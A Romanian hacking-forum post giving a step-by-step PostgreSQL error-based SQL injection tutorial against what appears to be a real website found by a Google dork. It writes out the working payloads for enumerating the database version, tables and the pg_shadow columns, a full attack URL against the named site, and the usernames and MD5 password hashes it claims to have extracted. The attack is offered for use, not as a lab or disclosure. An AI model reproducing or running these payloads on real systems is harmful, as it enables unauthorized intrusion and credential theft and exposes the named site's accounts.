Jump to content
Sheyken

PostGREsql Injection Tutorial.

Recommended Posts

As dori sa imi incep activitatea pe RST cu un topic care va aduce "benifici" comunitati, sau userilor din aceasta comunitate.

Probabil, majoritatea stiti cele mai usoare metode de SQL Injection [ principalele ]:

MySQL Injection Union Based sau Blind etc.

M-am gandit sa fac un tutorial pentru cei care "ar vrea" sa avanseze in injecti, si acela este: Un tutorial despre PostGreSQL Injection.

---------------------------

Ca de obicei luam un site, m-am grabit si am luat un site [ cu ajutorul lui gooogle, prin dorku' -> inurl:.php? intext:Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: ]

Ok, sa incepem partea "practica":

[1] Daca ar fi sa o luam de la 0, am cauta versiunea bazei de date, pentru a afla versiunea este necesar urmatorul query:

and 1=cast(version() as int)--

In cazul meu:

tutorial1zc.png

[2] Continuarea se face prin aflarea tabelelor din baza de date, pentru a afla primul tabel este necesar urmatorul query:

and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--

In cazul meu:

tutorial2l.png

Primul tabel din baza de date, este pg_type. Pentru a trece la urmatorul tabel este necesar urmatorul query:

and 1=cast((select table_name from information_schema.tables where table_name not in ('TABEL') limit 1 offset 0) as int)--

In cazul meu:

and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type') limit 1 offset 0) as int)--

Urmatorul tabel este: pg_attribute

Vom continua injectia, eu am facut-o mai pe scurt si m-am dus la tabelul care ma intereseaza [ cel cu useri ].

Query intreg:

http://www.aspem.org/indexa.php?p=290&p1=-80' and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type','pg_attribute','user_mapping_options','user_mappings','tables','triggered_update_columns','triggers','usage_privileges','view_column_usage','view_routine_usage','view_table_usage','views','data_type_privileges','element_types','_pg_foreign_data_wrappers','foreign_data_wrapper_options','foreign_data_wrappers','pg_statistic','_pg_foreign_servers','foreign_server_options','foreign_servers','_pg_user_mappings','schemata','sequences','sql_features','sql_implementation_info','sql_languages','sql_packages','pg_database','pg_authid','pg_roles') limit 1 offset 0) as int)--+

Tabelul cu Useri este pg_shadow.

[3] Continuam cu extragerea coloanelor din tabelul pg_shadow, este necesar urmatorul query:

and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 0) as int)--

In cazul meu:

tutorial3fb.png

Prima coloana: usename

Pentru a extrage urmatoarea coloana este necesara urmatoarea modificare in Queryu' de deasupra.

and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 1) as int)--

A 2 a coloana: usesysid

Sarim... direct la coloana care ne intereseaza, coloana "passwd".

and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 5) as int)--

Avem coloanele care ne intereseaza:

usename & passwd.

[4] Sa continuam, va trebui sa extragem din Usename & passwd. Data.

Este necesar urmatorul Query:

and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)--

Primul User:

tutorial3g.png

Al 2 lea user: postgres

Al 3 lea user: salvataggi

Prima Parola pentru useru' aspem:

Aveti nevoie de urmatorul Query:

and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)--

tutorial5e.png

Voi sari peste partea cu restul pozelor [ pentru ca va descurcati singuri, "sunteti baieti mari" ;)) ]

Total useri & parole:

User: aspem

Password: 4e8991501921aa20346da7d0ea86fe35 [MD5]

User: postgres

Password: 142484a40d02122af06bc427d4367d73 [MD5]

User: salvataggi

Password: No password.

----------------------------

Va multumesc ca "vati pierdut" timpul cu acest tutorial pe care poate [deja il stiati].

Edited by Sheyken
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...